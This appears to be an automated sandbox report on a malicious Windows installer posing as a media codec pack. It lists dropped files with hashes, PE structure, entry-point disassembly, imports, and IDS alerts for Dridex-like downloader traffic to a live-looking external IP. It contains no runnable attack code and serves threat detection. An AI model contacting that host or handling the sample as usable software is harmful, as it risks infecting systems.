                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):176128
                                                                                          Entropy (8bit):6.204917493416147
                                                                                          Encrypted:false
                                                                                          SSDEEP:3072:l9iEoC1+7N9UQV2Mi8NTUU3/EO3h3E9y6GeoPRtsoWhi75MUbvSHQ:l+ssU62Mi8x9P/UVGeQRthMUbvS
                                                                                          MD5:FEC4FF0C2967A05543747E8D552CF9DF
                                                                                          SHA1:B4449DC0DF8C0AFCC9F32776384A6F5B5CEDE20C
                                                                                          SHA-256:5374148EBCF4B456F8711516A58C9A007A393CA88F3D9759041F691E4343C7D6
                                                                                          SHA-512:93E3F48CD393314178CBC86F6142D577D5EAAE52B47C4D947DBA4DFB706860B150FF5B0E546CB83114CA44666E9DF6021964D79D064B775A58698DAA9550EF13
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp
                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                          Category:modified
                                                                                          Size (bytes):3186888
                                                                                          Entropy (8bit):6.230475147166178
                                                                                          Encrypted:false
                                                                                          SSDEEP:49152:5YOSeerrANJi8JBsNkPB4jnCViGF1awdEYO:SVeevAb/2kZ4jGiGFdO
                                                                                          MD5:1BADA3AB49364C26DA68D41031611AC7
                                                                                          SHA1:5BBB3CA5C6CED071A4297E0DB6C8AA96B16FA96B
                                                                                          SHA-256:F8A65D51ACF7D271F7BA0114366234DCE29BE27CFB73CA94AF990EC379350149
                                                                                          SHA-512:CFA982246856746524ECF44D45F5697B52DC6E90A828625697116B856CB7B51080562607EB89910216D18C8C13E2AED2AAAD65C58F66DEE3B6CDB79405C36701
                                                                                          Malicious:true
                                                                                          Yara Hits:
                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe, Author: Joe Security
                                                                                          Antivirus:
                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):499712
                                                                                          Entropy (8bit):6.414789978441117
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:fJzxYPVsBnxO/R7krZhUgiW6QR7t5k3Ooc8iHkC2eq:fZxvBnxOJ7ki3Ooc8iHkC2e
                                                                                          MD5:561FA2ABB31DFA8FAB762145F81667C2
                                                                                          SHA1:C8CCB04EEDAC821A13FAE314A2435192860C72B8
                                                                                          SHA-256:DF96156F6A548FD6FE5672918DE5AE4509D3C810A57BFFD2A91DE45A3ED5B23B
                                                                                          SHA-512:7D960AA8E3CCE22D63A6723D7F00C195DE7DE83B877ECA126E339E2D8CC9859E813E05C5C0A5671A75BB717243E9295FD13E5E17D8C6660EB59F5BAEE63A7C43
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):348160
                                                                                          Entropy (8bit):6.542655141037356
                                                                                          Encrypted:false
                                                                                          SSDEEP:6144:OcV9z83OtqxnEYmt3NEnvfF+Tbmbw6An8FMciFMNrb3YgxxpbCAOxO2ElvlE:Ooz83OtIEzW+/m/AyF7bCrO/E
                                                                                          MD5:86F1895AE8C5E8B17D99ECE768A70732
                                                                                          SHA1:D5502A1D00787D68F548DDEEBBDE1ECA5E2B38CA
                                                                                          SHA-256:8094AF5EE310714CAEBCCAEEE7769FFB08048503BA478B879EDFEF5F1A24FEFE
                                                                                          SHA-512:3B7CE2B67056B6E005472B73447D2226677A8CADAE70428873F7EFA5ED11A3B3DBF6B1A42C5B05B1F2B1D8E06FF50DFC6532F043AF8452ED87687EEFBF1791DA
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):645592
                                                                                          Entropy (8bit):6.50414583238337
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:i0zrcH2F3OfwjtWvuFEmhx0Cj37670jwX+E7tFKm0qTYh:iJUOfwh8u9hx0D70NE7tFTYh
                                                                                          MD5:E477A96C8F2B18D6B5C27BDE49C990BF
                                                                                          SHA1:E980C9BF41330D1E5BD04556DB4646A0210F7409
                                                                                          SHA-256:16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
                                                                                          SHA-512:335A86268E7C0E568B1C30981EC644E6CD332E66F96D2551B58A82515316693C1859D87B4F4B7310CF1AC386CEE671580FDD999C3BCB23ACF2C2282C01C8798C
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp
                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):717985
                                                                                          Entropy (8bit):6.514903952773555
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:STPcYn5c/rPx37/zHBA6a5UeYpthr1CERAgrNuR+FIq5MRxyFw:aPcYn5c/rPx37/zHBA6pFptZ1CE8qMR1
                                                                                          MD5:EACFC79F02180D07DE98139B1DD89524
                                                                                          SHA1:600E37A407063B3582FFC73A82BCDCA0928FD79D
                                                                                          SHA-256:D2909621E8EE51030A7EAD10479DD88EDC1B0CA8489C0756A8FD2F5705DB2534
                                                                                          SHA-512:BF30948AC036BBC7EEAC95250789754E85AFD856992FA1AD688B6F2F44D7871BB7C18A255A97AF190606E6184B3010D89F69269019DCBED3311470823994E320
                                                                                          Malicious:true
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp
                                                                                          File Type:InnoSetup Log MediaCodecPack, version 0x30, 4696 bytes, 921702\user, "C:\Users\user\AppData\Local\MediaCodecPack 1.1.22"
                                                                                          Category:dropped
                                                                                          Size (bytes):4696
                                                                                          Entropy (8bit):4.72346145184067
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:VUZ9eJdWs38tpRuk3mq9V+eOIhjza7ICSss/LnZIiEQ63ywcyOymcPB:VUZ96dWs3KpRukW1HIhjcICSsAnZI9Qs
                                                                                          MD5:7F2DE7F9C465DF68154845B6ED9F7AC7
                                                                                          SHA1:0480C10B0DDE42F653C14515F25702288B2947FA
                                                                                          SHA-256:232A466A4D8C1E6E61FBC99DB384BD752D5163029A19679CDA9F299B629C835C
                                                                                          SHA-512:9B1C475D50AA19420519CF8AF4C0EA2ABE112FACF3771F0F20D89ED7529C933DB934151F6FC3629CAC682300A191920DEC72B2CFA6D31941EFC01EC337448451
                                                                                          Malicious:false
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp
                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):717985
                                                                                          Entropy (8bit):6.514903952773555
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:STPcYn5c/rPx37/zHBA6a5UeYpthr1CERAgrNuR+FIq5MRxyFw:aPcYn5c/rPx37/zHBA6pFptZ1CE8qMR1
                                                                                          MD5:EACFC79F02180D07DE98139B1DD89524
                                                                                          SHA1:600E37A407063B3582FFC73A82BCDCA0928FD79D
                                                                                          SHA-256:D2909621E8EE51030A7EAD10479DD88EDC1B0CA8489C0756A8FD2F5705DB2534
                                                                                          SHA-512:BF30948AC036BBC7EEAC95250789754E85AFD856992FA1AD688B6F2F44D7871BB7C18A255A97AF190606E6184B3010D89F69269019DCBED3311470823994E320
                                                                                          Malicious:true
                                                                                          Process:C:\Users\user\Desktop\steel.exe.3.exe
                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):706560
                                                                                          Entropy (8bit):6.5063766308210695
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:aTPcYn5c/rPx37/zHBA6a5UeYpthr1CERAgrNuR+FIq5MRxyF:yPcYn5c/rPx37/zHBA6pFptZ1CE8qMRU
                                                                                          MD5:192CB1EFDC38E560F417C173410B8749
                                                                                          SHA1:95EC6D2B92A9E9EC5EA4F18CA20061B9A5F1354E
                                                                                          SHA-256:EC21B358820D9243942D00CD757973F8C023D2A4964561E612C6DF1B0B32BAD9
                                                                                          SHA-512:356FB46E7346EFA9F62401F36C3F8B3282B3B9580B00434AC72E0B7E364A483695776489829656D0AD18F99521A2127E9C490E7371988FF613E62DF1444A81C5
                                                                                          Malicious:true
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):2560
                                                                                          Entropy (8bit):2.8818118453929262
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:e1GSgDIX566lIB6SXvVmMPUjvhBrDsqZ:SgDKRlVImgUNBsG
                                                                                          MD5:A69559718AB506675E907FE49DEB71E9
                                                                                          SHA1:BC8F404FFDB1960B50C12FF9413C893B56F2E36F
                                                                                          SHA-256:2F6294F9AA09F59A574B5DCD33BE54E16B39377984F3D5658CDA44950FA0F8FC
                                                                                          SHA-512:E52E0AA7FE3F79E36330C455D944653D449BA05B2F9ABEE0914A0910C3452CFA679A40441F9AC696B3CCF9445CBB85095747E86153402FC362BB30AC08249A63
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp
                                                                                          File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):6144
                                                                                          Entropy (8bit):4.289297026665552
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:Sv1LfWvPcXegCPUo1vlZQrAxoONfHFZONfH3d1xCWMBFNL2pGSS4k+bkg6j0KHc:wfkcXegaJ/ZAYNzcld1xaX12pfSKvkc
                                                                                          MD5:C8871EFD8AF2CF4D9D42D1FF8FADBF89
                                                                                          SHA1:D0EACD5322C036554D509C7566F0BCC7607209BD
                                                                                          SHA-256:E4FC574A01B272C2D0AED0EC813F6D75212E2A15A5F5C417129DD65D69768F40
                                                                                          SHA-512:2735BB610060F749E26ACD86F2DF2B8A05F2BDD3DCCF3E4B2946EBB21BA0805FB492C474B1EEB2C5B8BF1A421F7C1B8728245F649C644F4A9ECC5BD8770A16F6
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):23312
                                                                                          Entropy (8bit):4.596242908851566
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:+Vm08QoKkiWZ76UJuP71W55iWHHoSHigH2euwsHTGHVb+VHHmnH+aHjHqLHxmoq1:2m08QotiCjJuPGw4
                                                                                          MD5:92DC6EF532FBB4A5C3201469A5B5EB63
                                                                                          SHA1:3E89FF837147C16B4E41C30D6C796374E0B8E62C
                                                                                          SHA-256:9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
                                                                                          SHA-512:9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                          Entropy (8bit):7.997553528524186
                                                                                          TrID:
                                                                                          • Win32 Executable (generic) a (10002005/4) 98.73%
                                                                                          • Inno Setup installer (109748/4) 1.08%
                                                                                          • Windows Screen Saver (13104/52) 0.13%
                                                                                          • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                          File name:steel.exe.3.exe
                                                                                          File size:3'295'664 bytes
                                                                                          MD5:db153670ed84a7e848fa356e7aecc80d
                                                                                          SHA1:7c6be83fc3b7af9c5980c6d46a4a604b7c878ebd
                                                                                          SHA256:ba58d3f14d7e106b3ad8d60501bdbcaf19506731b5085d478d9a0887e6b0b524
                                                                                          SHA512:079bacd7beb23aa0e2b8c52ccebc13d65792bd39fb45c8831da4947af10d5d31b99115ddf68163466578d90bfebf8e8892b1e827f263ace569a78af51c610e36
                                                                                          SSDEEP:49152:C9XpqfbcbSvc5ktiyevRogYI28M5Ycv85L60t8IWOrVqmnf3jiJKuNqz:MnbStH8ogYI28S5v8G/OocpYqz
                                                                                          TLSH:43E533604C940DB4D06224B63A31C3BD5BB36C1E882D1957249CFD6BBB168D8EA5BF4F
                                                                                          Icon Hash:2d2e3797b32b2b99
                                                                                          Entrypoint:0x40a5f8
                                                                                          Entrypoint Section:CODE
                                                                                          Digitally signed:false
                                                                                          Imagebase:0x400000
                                                                                          Subsystem:windows gui
                                                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                          DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                          Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                                          TLS Callbacks:
                                                                                          CLR (.Net) Version:
                                                                                          OS Version Major:1
                                                                                          OS Version Minor:0
                                                                                          File Version Major:1
                                                                                          File Version Minor:0
                                                                                          Subsystem Version Major:1
                                                                                          Subsystem Version Minor:0
                                                                                          Import Hash:884310b1928934402ea6fec1dbd3cf5e
                                                                                          Instruction
                                                                                          push ebp
                                                                                          mov ebp, esp
                                                                                          add esp, FFFFFFC4h
                                                                                          push ebx
                                                                                          push esi
                                                                                          push edi
                                                                                          xor eax, eax
                                                                                          mov dword ptr [ebp-10h], eax
                                                                                          mov dword ptr [ebp-24h], eax
                                                                                          call 00007F9D3CFD2BC3h
                                                                                          call 00007F9D3CFD3DCAh
                                                                                          call 00007F9D3CFD4059h
                                                                                          call 00007F9D3CFD40FCh
                                                                                          call 00007F9D3CFD609Bh
                                                                                          call 00007F9D3CFD8A06h
                                                                                          call 00007F9D3CFD8B6Dh
                                                                                          xor eax, eax
                                                                                          push ebp
                                                                                          push 0040ACC9h
                                                                                          push dword ptr fs:[eax]
                                                                                          mov dword ptr fs:[eax], esp
                                                                                          xor edx, edx
                                                                                          push ebp
                                                                                          push 0040AC92h
                                                                                          push dword ptr fs:[edx]
                                                                                          mov dword ptr fs:[edx], esp
                                                                                          mov eax, dword ptr [0040C014h]
                                                                                          call 00007F9D3CFD961Bh
                                                                                          call 00007F9D3CFD9206h
                                                                                          cmp byte ptr [0040B234h], 00000000h
                                                                                          je 00007F9D3CFDA0FEh
                                                                                          call 00007F9D3CFD9718h
                                                                                          xor eax, eax
                                                                                          call 00007F9D3CFD38B9h
                                                                                          lea edx, dword ptr [ebp-10h]
                                                                                          xor eax, eax
                                                                                          call 00007F9D3CFD66ABh
                                                                                          mov edx, dword ptr [ebp-10h]
                                                                                          mov eax, 0040CE28h
                                                                                          call 00007F9D3CFD2C5Ah
                                                                                          push 00000002h
                                                                                          push 00000000h
                                                                                          push 00000001h
                                                                                          mov ecx, dword ptr [0040CE28h]
                                                                                          mov dl, 01h
                                                                                          mov eax, 0040738Ch
                                                                                          call 00007F9D3CFD6F3Ah
                                                                                          mov dword ptr [0040CE2Ch], eax
                                                                                          xor edx, edx
                                                                                          push ebp
                                                                                          push 0040AC4Ah
                                                                                          push dword ptr fs:[edx]
                                                                                          mov dword ptr fs:[edx], esp
                                                                                          call 00007F9D3CFD9676h
                                                                                          mov dword ptr [0040CE34h], eax
                                                                                          mov eax, dword ptr [0040CE34h]
                                                                                          cmp dword ptr [eax+0Ch], 00000000h
Data directories

Name                                 | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT         | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_IMPORT         | 0xd000          | 0x950        | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE       | 0x11000         | 0x2c00       | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_SECURITY       | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_BASERELOC      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_DEBUG          | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_TLS            | 0xf000          | 0x18         | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG    | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT   | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_IAT            | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT   | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_RESERVED       | 0x0             | 0x0          |
Sections

Name   | Virtual Address | Virtual Size | Raw Size | MD5                              | Xored PE | ZLIB Complexity    | File Type | Entropy            | Characteristics
CODE   | 0x1000          | 0x9d30       | 0x9e00   | c3bd95c4b1a8e5199981e0d9b45fd18c | False    | 0.6052709651898734 | data      | 6.631765876950794  | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
DATA   | 0xb000          | 0x250        | 0x400    | 1ee71d84f1c77af85f1f5c278f880572 | False    | 0.306640625        | data      | 2.751820662285145  | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
BSS    | 0xc000          | 0xe8c        | 0x0      | d41d8cd98f00b204e9800998ecf8427e | False    | 0                  | empty     | 0.0                | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0xd000          | 0x950        | 0xa00    | bb5485bf968b970e5ea81292af2acdba | False    | 0.414453125        | data      | 4.430733069799036  | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls   | 0xe000          | 0x8          | 0x0      | d41d8cd98f00b204e9800998ecf8427e | False    | 0                  | empty     | 0.0                | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0xf000          | 0x18         | 0x200    | 9ba824905bf9c7922b6fc87a38b74366 | False    | 0.052734375        | data      | 0.2044881574398449 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.reloc | 0x10000         | 0x8c4        | 0x0      | d41d8cd98f00b204e9800998ecf8427e | False    | 0                  | empty     | 0.0                | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.rsrc  | 0x11000         | 0x2c00       | 0x2c00   | fcbf401062477a1819ab7c1055c10acc | False    | 0.3254616477272727 | data      | 4.4922954803823965 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x11354 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | Dutch | Netherlands | 0.5675675675675675
RT_ICON | 0x1147c | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 320 | Dutch | Netherlands | 0.4486994219653179
RT_ICON | 0x119e4 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 640 | Dutch | Netherlands | 0.4637096774193548
RT_ICON | 0x11ccc | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1152 | Dutch | Netherlands | 0.3935018050541516
RT_STRING | 0x12574 | 0x2f2 | data | | | 0.35543766578249336
RT_STRING | 0x12868 | 0x30c | data | | | 0.3871794871794872
RT_STRING | 0x12b74 | 0x2ce | data | | | 0.42618384401114207
RT_STRING | 0x12e44 | 0x68 | data | | | 0.75
RT_STRING | 0x12eac | 0xb4 | data | | | 0.6277777777777778
RT_STRING | 0x12f60 | 0xae | data | | | 0.5344827586206896
RT_RCDATA | 0x13010 | 0x2c | data | | | 1.1818181818181819
RT_GROUP_ICON | 0x1303c | 0x3e | data | English | United States | 0.8387096774193549
RT_VERSION | 0x1307c | 0x4f4 | data | English | United States | 0.2610410094637224
RT_MANIFEST | 0x13570 | 0x5a4 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.42590027700831024
DLL | Import
kernel32.dll | DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, WideCharToMultiByte, TlsSetValue, TlsGetValue, MultiByteToWideChar, GetModuleHandleA, GetLastError, GetCommandLineA, WriteFile, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetSystemTime, GetFileType, ExitProcess, CreateFileA, CloseHandle
user32.dll | MessageBoxA
oleaut32.dll | VariantChangeTypeEx, VariantCopyInd, VariantClear, SysStringLen, SysAllocStringLen
advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA
kernel32.dll | WriteFile, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, Sleep, SizeofResource, SetLastError, SetFilePointer, SetErrorMode, SetEndOfFile, RemoveDirectoryA, ReadFile, LockResource, LoadResource, LoadLibraryA, IsDBCSLeadByte, GetWindowsDirectoryA, GetVersionExA, GetUserDefaultLangID, GetSystemInfo, GetSystemDefaultLCID, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeProcess, GetEnvironmentVariableA, GetCurrentProcess, GetCommandLineA, GetACP, InterlockedExchange, FormatMessageA, FindResourceA, DeleteFileA, CreateProcessA, CreateFileA, CreateDirectoryA, CloseHandle
user32.dll | TranslateMessage, SetWindowLongA, PeekMessageA, MsgWaitForMultipleObjects, MessageBoxA, LoadStringA, ExitWindowsEx, DispatchMessageA, DestroyWindow, CreateWindowExA, CallWindowProcA, CharPrevA
comctl32.dll | InitCommonControls
advapi32.dll | AdjustTokenPrivileges
Language of compilation system | Country where language is spoken | Map
Dutch | Netherlands |
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-18T13:44:58.587503+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.4 | 49737 | 188.119.66.185 | 443 | TCP
2024-12-18T13:44:59.321192+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49737 | 188.119.66.185 | 443 | TCP
2024-12-18T13:45:04.162347+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.4 | 49755 | 188.119.66.185 | 443 | TCP
2024-12-18T13:45:04.886282+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49755 | 188.119.66.185 | 443 | TCP
2024-12-18T13:45:06.653285+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.4 | 49761 | 188.119.66.185 | 443 | TCP
2024-12-18T13:45:07.341047+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49761 | 188.119.66.185 | 443 | TCP
2024-12-18T13:45:09.025805+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.4 | 49768 | 188.119.66.185 | 443 | TCP
2024-12-18T13:45:09.711078+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49768 | 188.119.66.185 | 443 | TCP
2024-12-18T13:45:11.275909+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.4 | 49774 | 188.119.66.185 | 443 | TCP
2024-12-18T13:45:11.970395+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49774 | 188.119.66.185 | 443 | TCP
2024-12-18T13:45:13.603425+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.4 | 49780 | 188.119.66.185 | 443 | TCP
2024-12-18T13:45:14.300144+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49780 | 188.119.66.185 | 443 | TCP
2024-12-18T13:45:15.872940+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.4 | 49786 | 188.119.66.185 | 443 | TCP
2024-12-18T13:45:16.712134+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49786 | 188.119.66.185 | 443 | TCP
2024-12-18T13:45:18.301991+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.4 | 49792 | 188.119.66.185 | 443 | TCP
2024-12-18T13:45:18.984985+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49792 | 188.119.66.185 | 443 | TCP
2024-12-18T13:45:20.934363+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.4 | 49797 | 188.119.66.185 | 443 | TCP
2024-12-18T13:45:21.691519+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49797 | 188.119.66.185 | 443 | TCP
2024-12-18T13:45:23.260152+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.4 | 49807 | 188.119.66.185 | 443 | TCP
2024-12-18T13:45:23.944971+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49807 | 188.119.66.185 | 443 | TCP
2024-12-18T13:45:25.702931+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.4 | 49814 | 188.119.66.185 | 443 | TCP
2024-12-18T13:45:26.388621+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49814 | 188.119.66.185 | 443 | TCP
2024-12-18T13:45:28.010091+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.4 | 49819 | 188.119.66.185 | 443 | TCP
2024-12-18T13:45:28.718839+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49819 | 188.119.66.185 | 443 | TCP
2024-12-18T13:45:30.289917+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.4 | 49825 | 188.119.66.185 | 443 | TCP
2024-12-18T13:45:30.977003+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49825 | 188.119.66.185 | 443 | TCP
2024-12-18T13:45:32.568917+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.4 | 49831 | 188.119.66.185 | 443 | TCP
2024-12-18T13:45:33.376875+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49831 | 188.119.66.185 | 443 | TCP
2024-12-18T13:45:35.172199+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.4 | 49837 | 188.119.66.185 | 443 | TCP
2024-12-18T13:45:35.882009+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49837 | 188.119.66.185 | 443 | TCP
2024-12-18T13:45:37.453939+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.4 | 49843 | 188.119.66.185 | 443 | TCP
2024-12-18T13:45:38.164576+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49843 | 188.119.66.185 | 443 | TCP
2024-12-18T13:45:39.918052+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.4 | 49849 | 188.119.66.185 | 443 | TCP
